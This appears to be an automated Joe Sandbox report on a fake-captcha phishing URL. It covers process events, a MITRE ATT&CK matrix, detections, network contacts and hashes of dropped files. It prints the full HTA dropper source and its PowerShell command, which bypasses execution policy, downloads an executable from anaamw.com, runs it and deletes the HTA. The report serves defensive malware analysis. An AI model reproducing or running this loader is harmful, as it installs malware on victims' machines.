        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\ProgramData\Captcha.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\ProgramData\Captcha.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1982
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1193
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8687
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 1982 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 45 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 1193 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -4611686018427385s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752Thread sleep count: 8687 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        PowerShell        		3
        Browser Extensions        		11
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote Services1
        Email Collection        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection        		11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        DLL Side-Loading        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture4
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        File Deletion        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Extra Window Memory Injection        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Screenshots

        Download Video

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        https://anaamw.om/p3.php/10%Avira URL Cloudsafe

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\ProgramData\Captcha.exe100%AviraTR/Redcap.ivwok
        C:\ProgramData\Captcha.exe38%ReversingLabsWin32.Adware.RedCap

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://anaamw.com/p3.php/1?js100%Avira URL Cloudmalware
        https://anaamw.com/favicon.ico100%Avira URL Cloudmalware
        https://portal.azure.com/apc/trans.gif?a38ce52767fa2b26b2add34685ee78100%Avira URL Cloudsafe
        https://anaamw.com/p3.php100%Avira URL Cloudmalware
        https://anaamw.com/Folder.exe100%Avira URL Cloudmalware
        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        google.com
        		142.250.64.78
        		truefalse
          		high
          ogads-pa.clients6.google.com
          		142.250.80.42
          		truefalse
            		high
            plus.l.google.com
            		142.250.80.14
            		truefalse
              		high
              play.google.com
              		142.250.80.78
              		truefalse
                		high
                anaamw.com
                		66.96.147.114
                		truefalse
                  		high
                  www.google.com
                  		142.251.41.4
                  		truefalse
                    		high
                    anaamw.om
                    		unknown
                    		unknownfalse
                      		high
                      apis.google.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.google.com/async/ddljson?async=ntp:2false
                          		high
                          https://anaamw.com/Folder.exetrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://anaamw.com/p3.phptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://anaamw.com/p3.php/1?jstrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://portal.azure.com/apc/trans.gif?a38ce52767fa2b26b2add34685ee7810false
                          • Avira URL Cloud: safe
                          		unknown
                          https://anaamw.com/favicon.icotrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://anaamw.com/p3.php/1true
                            		unknown
                            https://www.google.com/async/newtab_promosfalse
                              		high
                              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0false
                                		high
                                https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                  		high
                                  https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                    		high
                                    https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncDatafalse
                                      		high
                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.80.14
                                        		plus.l.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        1.1.1.1
                                        		unknownAustralia
                                        		13335CLOUDFLARENETUSfalse
                                        142.250.65.174
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        142.250.65.163
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        142.250.80.110
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        66.96.147.114
                                        		anaamw.comUnited States
                                        		29873BIZLAND-SDUSfalse
                                        142.250.80.42
                                        		ogads-pa.clients6.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        142.250.80.99
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        8.8.8.8
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        142.251.40.142
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        142.251.40.163
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse
                                        142.251.41.4
                                        		www.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        142.250.31.84
                                        		unknownUnited States
                                        		15169GOOGLEUSfalse

                                        Private

                                        IP
                                        192.168.2.18
                                        192.168.2.4
                                        192.168.2.24

                                        General Information

                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1654830
                                        Start date and time:2025-04-02 16:56:57 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://anaamw.om/p3.php/1
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:21
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.phis.evad.win@37/15@33/115
                                        • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 184.31.69.3, 142.250.65.163, 142.250.65.174, 142.250.80.110, 142.250.31.84, 142.251.35.174, 172.217.165.142, 142.251.40.238
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: https://anaamw.om/p3.php/1

                                        Created / dropped Files

                                        C:\ProgramData\Captcha.exe

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):1925664
                                        Entropy (8bit):6.682528936136967
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CBB05282E7039F0CCFBC1FBB455F14CB
                                        SHA1:CD06736FF9947E772DC42ABF9021B23FAF0ADF82
                                        SHA-256:95295068E3737CA1F0DFF1678E8D998ECF69FF150BD8DED6B7097230E1D3CE40
                                        SHA-512:4BA10ABA0A589C11C22D6306FDC01C183AF90BC277E9E076C4FB64B5A752CCDAAB07451DF89F31E1D863260139CF16240711874AE75341198A7614490773D265
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 38%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................6...@....................@..........................`......Jy....@..................................0.......0...%.............. r...@...................................................... ................................text....4.......6..................`..`.rdata..,....P.......:..............@..@.data....4..........................@....idata.......0......................@....reloc.......@......................@..B.symtab...... .........................B.rsrc....%...0...&..................@..@........................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MX73DBBW\p3[1].htm

                                        Download File
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, ASCII text, with very long lines (684), with no line terminators
                                        Category:dropped
                                        Size (bytes):684
                                        Entropy (8bit):5.520581683346053
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7DC5D123060C1C040B62E5833B9DF426
                                        SHA1:E0D1EC498DA1C3056A997FB05C8C60F3D6E43143
                                        SHA-256:D05A6CB855D87CD7841CB4A34074E23484F6B2FF8756835AABC153980EE0323F
                                        SHA-512:2E66FFD65F631C3F4251EBAB353032778E6BF3F86CD6751127D3322374A58C243F7DD9CD096F44FD33A1D1E6ED90D3FE14CC42B14880BCCCA35E83C467FBB1FC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\\ProgramData\\Captcha.exe; Start-Process 'C:\\ProgramData\\Captcha.exe'\"",0);var filename = window.location.href;filename = decodeURI(filename);filename = filename.replace("file:///", "");var fso = new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(filename)){try{fso.DeleteFile(filename,true)}catch(e){}}window.close()</script></head><body></body></html>

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16000
                                        Entropy (8bit):5.481547571910865
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:31019EC1D7D594B8CFA259CA5092AEB4
                                        SHA1:64365CDA475E117A63188E0203D23B88A607DF7B
                                        SHA-256:4AD05942C2BF8F5B417D74DB404020C790762F6056C4F1165BA7F2CECBF3E1DD
                                        SHA-512:B50B40D121DD13AC796848B7B1197D6876EF1BC1E612ADBE7849BCD5647C97ACCC2709A400EF85709FC41D8D58B2555DA6C335A695FE78C625FBFC7425B4633F
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:@...e...........?....................................@..........H...............o..b~.D.poM...B..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.2.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_catfdnkv.dpc.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        Chrome Cache Entry: 63

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):29
                                        Entropy (8bit):3.9353986674667634
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6FED308183D5DFC421602548615204AF
                                        SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                        SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                        SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.google.com/async/newtab_promos
                                        Preview:)]}'.{"update":{"promos":{}}}

                                        Chrome Cache Entry: 64

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (2412)
                                        Category:downloaded
                                        Size (bytes):174551
                                        Entropy (8bit):5.55722757897879
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:08F598A3C3E8FD41EE8BDB46973A9523
                                        SHA1:0FA21DCF0E1EFDFBA96348031DAE50CDD674DFE7
                                        SHA-256:F914832ADB9297BF49C2C2133BB1B55221C4693134D814485E7C4DFDE5999C68
                                        SHA-512:354338C93285E1D8372D5BE15F935092A053FBBDE1FF76680919FC9B2F98ED61D4E6176CC698820DF2756A1A6336C07E59E2ECB956661658E6484EB1135F2A8E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ke5z57QrnxY.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvRbRtHDArzB3468AVDc4vas6qBEw"
